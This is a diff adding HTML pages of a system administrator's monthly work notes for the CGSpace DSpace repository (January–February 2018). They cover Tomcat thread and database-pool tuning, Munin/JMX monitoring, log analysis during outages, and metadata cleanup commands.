+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads3.log
+</code></pre><ul>
+<li>I changed the parameters back to the baseline ones and switched the Tomcat JVM garbage collector to G1GC and re-ran the tests</li>
+<li>JVM options for Tomcat changed from <code>-Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC</code> to <code>-Xms3072m -Xmx3072m -XX:+UseG1GC -XX:+PerfDisableSharedMem</code></li>
+</ul>
+<pre tabindex="0"><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc2.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-g1gc3.log
+</code></pre><ul>
+<li>I haven&rsquo;t had time to look at the results yet</li>
+</ul>
+<h2 id="2018-01-26">2018-01-26</h2>
+<ul>
+<li>Peter followed up about some of the points from the Skype meeting last week</li>
+<li>Regarding the ORCID field issue, I see <a href="http://repo.mel.cgiar.org/handle/20.500.11766/7668?show=full">ICARDA&rsquo;s MELSpace is using <code>cg.creator.ID</code></a>: 0000-0001-9156-7691</li>
+<li>I had floated the idea of using a controlled vocabulary with values formatted something like: Orth, Alan S. (0000-0002-1735-7458)</li>
+<li>Update PostgreSQL JDBC driver version from 42.1.4 to 42.2.1 on DSpace Test, see: <a href="https://jdbc.postgresql.org/">https://jdbc.postgresql.org/</a></li>
+<li>Reboot DSpace Test to get new Linode kernel (Linux 4.14.14-x86_64-linode94)</li>
+<li>I am testing my old work on the <code>dc.rights</code> field, I had added a branch for it a few months ago</li>
+<li>I added a list of Creative Commons and other licenses in <code>input-forms.xml</code></li>
+<li>The problem is that Peter wanted to use two questions, one for CG centers and one for other, but using the same metadata value, which isn&rsquo;t possible (?)</li>
+<li>So I used some creativity and made several fields display values, but not store any, ie:</li>
+</ul>
+<pre tabindex="0"><code>&lt;pair&gt;
+  &lt;displayed-value&gt;For products published by another party:&lt;/displayed-value&gt;
+  &lt;stored-value&gt;&lt;/stored-value&gt;
+&lt;/pair&gt;
+</code></pre><ul>
+<li>I was worried that if a user selected this field for some reason that DSpace would store an empty value, but it simply doesn&rsquo;t register that as a valid option:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/dc-rights-submission.png" alt="Rights"></p>
+<ul>
+<li>I submitted a test item with ORCiDs and dc.rights from a controlled vocabulary on DSpace Test: <a href="https://dspacetest.cgiar.org/handle/10568/97703">https://dspacetest.cgiar.org/handle/10568/97703</a></li>
+<li>I will send it to Peter to check and give feedback (ie, about the ORCiD field name as well as allowing users to add ORCiDs manually or not)</li>
+</ul>
+<h2 id="2018-01-28">2018-01-28</h2>
+<ul>
+<li>Assist Udana from WLE again to proof his 25 records and upload them to DSpace Test</li>
+<li>I am playing with the <code>startStopThreads=&quot;0&quot;</code> parameter in Tomcat <code>&lt;Engine&gt;</code> and <code>&lt;Host&gt;</code> configuration</li>
+<li>It reduces the start up time of Catalina by using multiple threads to start web applications in parallel</li>
+<li>On my local test machine the startup time went from 70 to 30 seconds</li>
+<li>See: <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/host.html">https://tomcat.apache.org/tomcat-7.0-doc/config/host.html</a></li>
+</ul>
+<h2 id="2018-01-29">2018-01-29</h2>
+<ul>
+<li>CGSpace went down this morning for a few minutes, according to UptimeRobot</li>
+<li>Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-29 05:30:22,226 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
+2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+Was expecting one of:
+    &#34;TO&#34; ...
+    &lt;RANGE_QUOTED&gt; ...
+    &lt;RANGE_GOOP&gt; ...
+    
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
+Was expecting one of:
+    &#34;TO&#34; ...
+    &lt;RANGE_QUOTED&gt; ...
+    &lt;RANGE_GOOP&gt; ...
+</code></pre><ul>
+<li>So is this an error caused by this particular client (which happens to be <code>Yahoo! Slurp</code>)?</li>
+<li>I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early</li>
+<li>Perhaps this from the nginx error log is relevant?</li>
+</ul>
+<pre tabindex="0"><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &#34;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&#34;, upstream: &#34;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&#34;, host: &#34;cgspace.cgiar.org&#34;
+</code></pre><ul>
+<li>I think that must be unrelated, probably the client closed the request to nginx because DSpace (Tomcat) was taking too long</li>
+<li>An interesting <a href="https://gist.github.com/magnetikonline/11312172">snippet to get the maximum and average nginx responses</a>:</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&#34;Maximum: %d\nAverage: %d\n&#34;,max,i?sum/i:0); }&#39; /var/log/nginx/access.log
+Maximum: 2771268
+Average: 210483
+</code></pre><ul>
+<li>I guess responses that don&rsquo;t fit in RAM get saved to disk (a default of 1024M), so this is definitely not the issue here, and that warning is totally unrelated</li>
+<li>My best guess is that the Solr search error is related somehow but I can&rsquo;t figure it out</li>
+<li>We definitely have enough database connections, as I haven&rsquo;t seen a pool error in weeks:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-2*
+dspace.log.2018-01-20:0
+dspace.log.2018-01-21:0
+dspace.log.2018-01-22:0
+dspace.log.2018-01-23:0
+dspace.log.2018-01-24:0
+dspace.log.2018-01-25:0
+dspace.log.2018-01-26:0
+dspace.log.2018-01-27:0
+dspace.log.2018-01-28:0
+dspace.log.2018-01-29:0
+</code></pre><ul>
+<li>Adam Hunt from WLE complained that pages take &ldquo;1-2 minutes&rdquo; to load each, from France and Sri Lanka</li>
+<li>I asked him which particular pages, as right now pages load in 2 or 3 seconds for me</li>
+<li>UptimeRobot said CGSpace went down again, and I looked at PostgreSQL and saw 211 active database connections</li>
+<li>If it&rsquo;s not memory and it&rsquo;s not database, it&rsquo;s gotta be Tomcat threads, seeing as the default <code>maxThreads</code> is 200 anyways, it actually makes sense</li>
+<li>I decided to change the Tomcat thread settings on CGSpace:
+<ul>
+<li><code>maxThreads</code> from 200 (default) to 400</li>
+<li><code>processorCache</code> from 200 (default) to 400, <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/http.html">recommended to be the same as <code>maxThreads</code></a></li>
+<li><code>minSpareThreads</code> from 10 (default) to 20</li>
+<li><code>acceptorThreadCount</code> from 1 (default) to 2, <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/http.html">recommended to be 2 on multi-CPU systems</a></li>
+</ul>
+</li>
+<li>Looks like I only enabled the new thread stuff on the connector used internally by Solr, so I probably need to match that by increasing them on the other connector that nginx proxies to</li>
+<li>Jesus Christ I need to fucking fix the Munin monitoring so that I can tell how many fucking threads I have running</li>
+<li>Wow, so apparently you need to specify which connector to check if you want any of the Munin Tomcat plugins besides &ldquo;tomcat_jvm&rdquo; to work (the connector name can be seen in the Catalina logs)</li>
+<li>I modified <em>/etc/munin/plugin-conf.d/tomcat</em> to add the connector (with surrounding quotes!) and now the other plugins work (obviously the credentials are incorrect):</li>
+</ul>
+<pre tabindex="0"><code>[tomcat_*]
+    env.host 127.0.0.1
+    env.port 8081
+    env.connector &#34;http-bio-127.0.0.1-8443&#34;
+    env.user munin
+    env.password munin
+</code></pre><ul>
+<li>For example, I can see the threads:</li>
+</ul>
+<pre tabindex="0"><code># munin-run tomcat_threads
+busy.value 0
+idle.value 20
+max.value 400
+</code></pre><ul>
+<li>Apparently you can&rsquo;t monitor more than one connector, so I guess the most important to monitor would be the one that nginx is sending stuff to</li>
+<li>So for now I think I&rsquo;ll just monitor these and skip trying to configure the jmx plugins</li>
+<li>Although following the logic of <em>/usr/share/munin/plugins/jmx_tomcat_dbpools</em> could be useful for getting the active Tomcat sessions</li>
+<li>From debugging the <code>jmx_tomcat_db_pools</code> script from the <code>munin-plugins-java</code> package, I see that this is how you call arbitrary mbeans:</li>
+</ul>
+<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
+Catalina:type=DataSource,class=javax.sql.DataSource,name=&#34;jdbc/dspace&#34;  maxActive       300
+</code></pre><ul>
+<li>More notes here: <a href="https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx">https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx</a></li>
+<li>Looking at the Munin graphs, I that the load is 200% every morning from 03:00 to almost 08:00</li>
+<li>Tomcat&rsquo;s catalina.out log file is full of spam from this thing too, with lines like this</li>
+</ul>
+<pre tabindex="0"><code>[===================&gt;                               ]38% time remaining: 5 hour(s) 21 minute(s) 47 seconds. timestamp: 2018-01-29 06:25:16
+</code></pre><ul>
+<li>There are millions of these status lines, for example in just this one log file:</li>
+</ul>
+<pre tabindex="0"><code># zgrep -c &#34;time remaining&#34; /var/log/tomcat7/catalina.out.1.gz
+1084741
+</code></pre><ul>
+<li>I filed a ticket with Atmire: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566</a></li>
+</ul>
+<h2 id="2018-01-31">2018-01-31</h2>
+<ul>
+<li>UptimeRobot says CGSpace went down at 7:57 AM, and indeed I see a lot of HTTP 499 codes in nginx logs</li>
+<li>PostgreSQL activity shows 222 database connections</li>
+<li>Now PostgreSQL activity shows 265 database connections!</li>
+<li>I don&rsquo;t see any errors anywhere&hellip;</li>
+<li>Now PostgreSQL activity shows 308 connections!</li>
+<li>Well this is interesting, there are 400 Tomcat threads busy:</li>
+</ul>
+<pre tabindex="0"><code># munin-run tomcat_threads
+busy.value 400
+idle.value 0
+max.value 400
+</code></pre><ul>
+<li>And wow, we finally exhausted the database connections, from dspace.log:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-31 08:05:28,964 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - 
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-451] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:300; busy:300; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>Now even the nightly Atmire background thing is getting HTTP 500 error:</li>
+</ul>
+<pre tabindex="0"><code>Jan 31, 2018 8:16:05 AM com.sun.jersey.spi.container.ContainerResponse logException
+SEVERE: Mapped exception to response: 500 (Internal Server Error)
+javax.ws.rs.WebApplicationException
+</code></pre><ul>
+<li>For now I will restart Tomcat to clear this shit and bring the site back up</li>
+<li>The top IPs from this morning, during 7 and 8AM in XMLUI and REST/OAI:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     67 66.249.66.70
+     70 207.46.13.12
+     71 197.210.168.174
+     83 207.46.13.13
+     85 157.55.39.79
+     89 207.46.13.14
+    123 68.180.228.157
+    198 66.249.66.90
+    219 41.204.190.40
+    255 2405:204:a208:1e12:132:2a8e:ad28:46c0
+# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      2 65.55.210.187
+      2 66.249.66.90
+      3 157.55.39.79
+      4 197.232.39.92
+      4 34.216.252.127
+      6 104.196.152.243
+      6 213.55.85.89
+     15 122.52.115.13
+     16 213.55.107.186
+    596 45.5.184.196
+</code></pre><ul>
+<li>This looks reasonable to me, so I have no idea why we ran out of Tomcat threads</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/tomcat-threads-day.png" alt="Tomcat threads"></p>
+<ul>
+<li>We need to start graphing the Tomcat sessions as well, though that requires JMX</li>
+<li>Also, I wonder if I could disable the nightly Atmire thing</li>
+<li>God, I don&rsquo;t know where this load is coming from</li>
+<li>Since I bumped up the Tomcat threads from 200 to 400 the load on the server has been sustained at about 200% for almost a whole day:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/cpu-week.png" alt="CPU usage week"></p>
+<ul>
+<li>I should make separate database pools for the web applications and the API applications like REST and OAI</li>
+<li>Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat&rsquo;s activeSessions from JMX (using <code>munin-plugins-java</code>):</li>
+</ul>
+<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
+Catalina:type=Manager,context=/,host=localhost  activeSessions  8
+</code></pre><ul>
+<li>If you connect to Tomcat in <code>jvisualvm</code> it&rsquo;s pretty obvious when you hover over the elements</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/jvisualvm-mbeans-path.png" alt="MBeans in JVisualVM"></p>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-02/index.html b/docs/2018-02/index.html
new file mode 100644
index 000000000..f1d9068e9
--- /dev/null
+++ b/docs/2018-02/index.html
@@ -0,0 +1,1092 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2018" />
+<meta property="og:description" content="2018-02-01
+
+Peter gave feedback on the dc.rights proof of concept that I had sent him last week
+We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list
+Yesterday I figured out how to monitor DSpace sessions using JMX
+I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-02/" />
+<meta property="article:published_time" content="2018-02-01T16:28:54+02:00" />
+<meta property="article:modified_time" content="2020-11-18T17:15:23+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2018"/>
+<meta name="twitter:description" content="2018-02-01
+
+Peter gave feedback on the dc.rights proof of concept that I had sent him last week
+We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list
+Yesterday I figured out how to monitor DSpace sessions using JMX
+I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-02/",
+  "wordCount": "6410",
+  "datePublished": "2018-02-01T16:28:54+02:00",
+  "dateModified": "2020-11-18T17:15:23+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-02/">
+
+    <title>February, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-02/">February, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-02-01T16:28:54+02:00">Thu Feb 01, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-02-01">2018-02-01</h2>
+<ul>
+<li>Peter gave feedback on the <code>dc.rights</code> proof of concept that I had sent him last week</li>
+<li>We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list</li>
+<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li>
+<li>I copied the logic in the <code>jmx_tomcat_dbpools</code> provided by Ubuntu&rsquo;s <code>munin-plugins-java</code> package and used the stuff I discovered about JMX <a href="/cgspace-notes/2018-01/">in 2018-01</a></li>
+</ul>
+<p><img src="/cgspace-notes/2018/02/jmx_dspace_sessions-day.png" alt="DSpace Sessions"></p>
+<ul>
+<li>Run all system updates and reboot DSpace Test</li>
+<li>Wow, I packaged up the <code>jmx_dspace_sessions</code> stuff in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> and deployed it on CGSpace and it totally works:</li>
+</ul>
+<pre tabindex="0"><code># munin-run jmx_dspace_sessions
+v_.value 223
+v_jspui.value 1
+v_oai.value 0
+</code></pre><h2 id="2018-02-03">2018-02-03</h2>
+<ul>
+<li>Bram from Atmire responded about the high load caused by the Solr updater script and said it will be fixed with the updates to DSpace 5.8 compatibility: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566</a></li>
+<li>We will close that ticket for now and wait for the 5.8 stuff: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560</a></li>
+<li>I finally took a look at the second round of cleanups Peter had sent me for author affiliations in mid January</li>
+<li>After trimming whitespace and quickly scanning for encoding errors I applied them on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
+$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Then I started a full Discovery reindex:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
+
+real    96m39.823s
+user    14m10.975s
+sys     2m29.088s
+</code></pre><ul>
+<li>Generate a new list of affiliations for Peter to sort through:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+COPY 3723
+</code></pre><ul>
+<li>Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in <a href="/cgspace-notes/2017-12/">December</a>:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2018&#34;
+3126109
+
+real    0m23.839s
+user    0m27.225s
+sys     0m1.905s
+</code></pre><h2 id="2018-02-05">2018-02-05</h2>
+<ul>
+<li>Toying with correcting authors with trailing spaces via PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, &#39;\s+$&#39; , &#39;&#39;) where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*?\s+$&#39;;
+UPDATE 20
+</code></pre><ul>
+<li>I tried the <code>TRIM(TRAILING from text_value)</code> function and it said it changed 20 items but the spaces didn&rsquo;t go away</li>
+<li>This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.</li>
+<li>Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
+COPY 55630
+</code></pre><h2 id="2018-02-06">2018-02-06</h2>
+<ul>
+<li>UptimeRobot says CGSpace is down this morning around 9:15</li>
+<li>I see 308 PostgreSQL connections in <code>pg_stat_activity</code></li>
+<li>The usage otherwise seemed low for REST/OAI as well as XMLUI in the last hour:</li>
+</ul>
+<pre tabindex="0"><code># date
+Tue Feb  6 09:30:32 UTC 2018
+# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      2 223.185.41.40
+      2 66.249.64.14
+      2 77.246.52.40
+      4 157.55.39.82
+      4 193.205.105.8
+      5 207.46.13.63
+      5 207.46.13.64
+      6 154.68.16.34
+      7 207.46.13.66
+   1548 50.116.102.77
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     77 213.55.99.121
+     86 66.249.64.14
+    101 104.196.152.243
+    103 207.46.13.64
+    118 157.55.39.82
+    133 207.46.13.66
+    136 207.46.13.63
+    156 68.180.228.157
+    295 197.210.168.174
+    752 144.76.64.79
+</code></pre><ul>
+<li>I did notice in <code>/var/log/tomcat7/catalina.out</code> that Atmire&rsquo;s update thing was running though</li>
+<li>So I restarted Tomcat and now everything is fine</li>
+<li>Next time I see that many database connections I need to save the output so I can analyze it later</li>
+<li>I&rsquo;m going to re-schedule the taskUpdateSolrStatsMetadata task as <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566">Bram detailed in ticket 566</a> to see if it makes CGSpace stop crashing every morning</li>
+<li>If I move the task from 3AM to 3PM, ideally CGSpace will stop crashing in the morning, or start crashing ~12 hours later</li>
+<li>Eventually Atmire has said that there will be a fix for this high load caused by their script, but it will come with the 5.8 compatability they are already working on</li>
+<li>I re-deployed CGSpace with the new task time of 3PM, ran all system updates, and restarted the server</li>
+<li>Also, I changed the name of the DSpace fallback pool on DSpace Test and CGSpace to be called &lsquo;dspaceCli&rsquo; so that I can distinguish it in <code>pg_stat_activity</code></li>
+<li>I implemented some changes to the pooling in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> so that each DSpace web application can use its own pool (web, api, and solr)</li>
+<li>Each pool uses its own name and hopefully this should help me figure out which one is using too many connections next time CGSpace goes down</li>
+<li>Also, this will mean that when a search bot comes along and hammers the XMLUI, the REST and OAI applications will be fine</li>
+<li>I&rsquo;m not actually sure if the Solr web application uses the database though, so I&rsquo;ll have to check later and remove it if necessary</li>
+<li>I deployed the changes on DSpace Test only for now, so I will monitor and make them on CGSpace later this week</li>
+</ul>
+<h2 id="2018-02-07">2018-02-07</h2>
+<ul>
+<li>Abenet wrote to ask a question about the ORCiD lookup not working for one CIAT user on CGSpace</li>
+<li>I tried on DSpace Test and indeed the lookup just doesn&rsquo;t work!</li>
+<li>The ORCiD code in DSpace appears to be using <code>http://pub.orcid.org/</code>, but when I go there in the browser it redirects me to <code>https://pub.orcid.org/v2.0/</code></li>
+<li>According to <a href="https://groups.google.com/forum/#!topic/orcid-api-users/qfg-HwAB1bk">the announcement</a> the v1 API was moved from <code>http://pub.orcid.org/</code> to <code>https://pub.orcid.org/v1.2</code> until March 1st when it will be discontinued for good</li>
+<li>But the old URL is hard coded in DSpace and it doesn&rsquo;t work anyways, because it currently redirects you to <code>https://pub.orcid.org/v2.0/v1.2</code></li>
+<li>So I guess we have to disable that shit once and for all and switch to a controlled vocabulary</li>
+<li>CGSpace crashed again, this time around <code>Wed Feb  7 11:20:28 UTC 2018</code></li>
+<li>I took a few snapshots of the PostgreSQL activity at the time and as the minutes went on and the connections were very high at first but reduced on their own:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; &gt; /tmp/pg_stat_activity.txt
+$ grep -c &#39;PostgreSQL JDBC&#39; /tmp/pg_stat_activity*
+/tmp/pg_stat_activity1.txt:300
+/tmp/pg_stat_activity2.txt:272
+/tmp/pg_stat_activity3.txt:168
+/tmp/pg_stat_activity4.txt:5
+/tmp/pg_stat_activity5.txt:6
+</code></pre><ul>
+<li>Interestingly, all of those 751 connections were idle!</li>
+</ul>
+<pre tabindex="0"><code>$ grep &#34;PostgreSQL JDBC&#34; /tmp/pg_stat_activity* | grep -c idle
+751
+</code></pre><ul>
+<li>Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps</li>
+<li>Looking the Munin graphs, I can see that there were almost double the normal number of DSpace sessions at the time of the crash (and also yesterday!):</li>
+</ul>
+<p><img src="/cgspace-notes/2018/02/jmx_dspace-sessions-day.png" alt="DSpace Sessions"></p>
+<ul>
+<li>Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
+1828
+</code></pre><ul>
+<li>CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)</li>
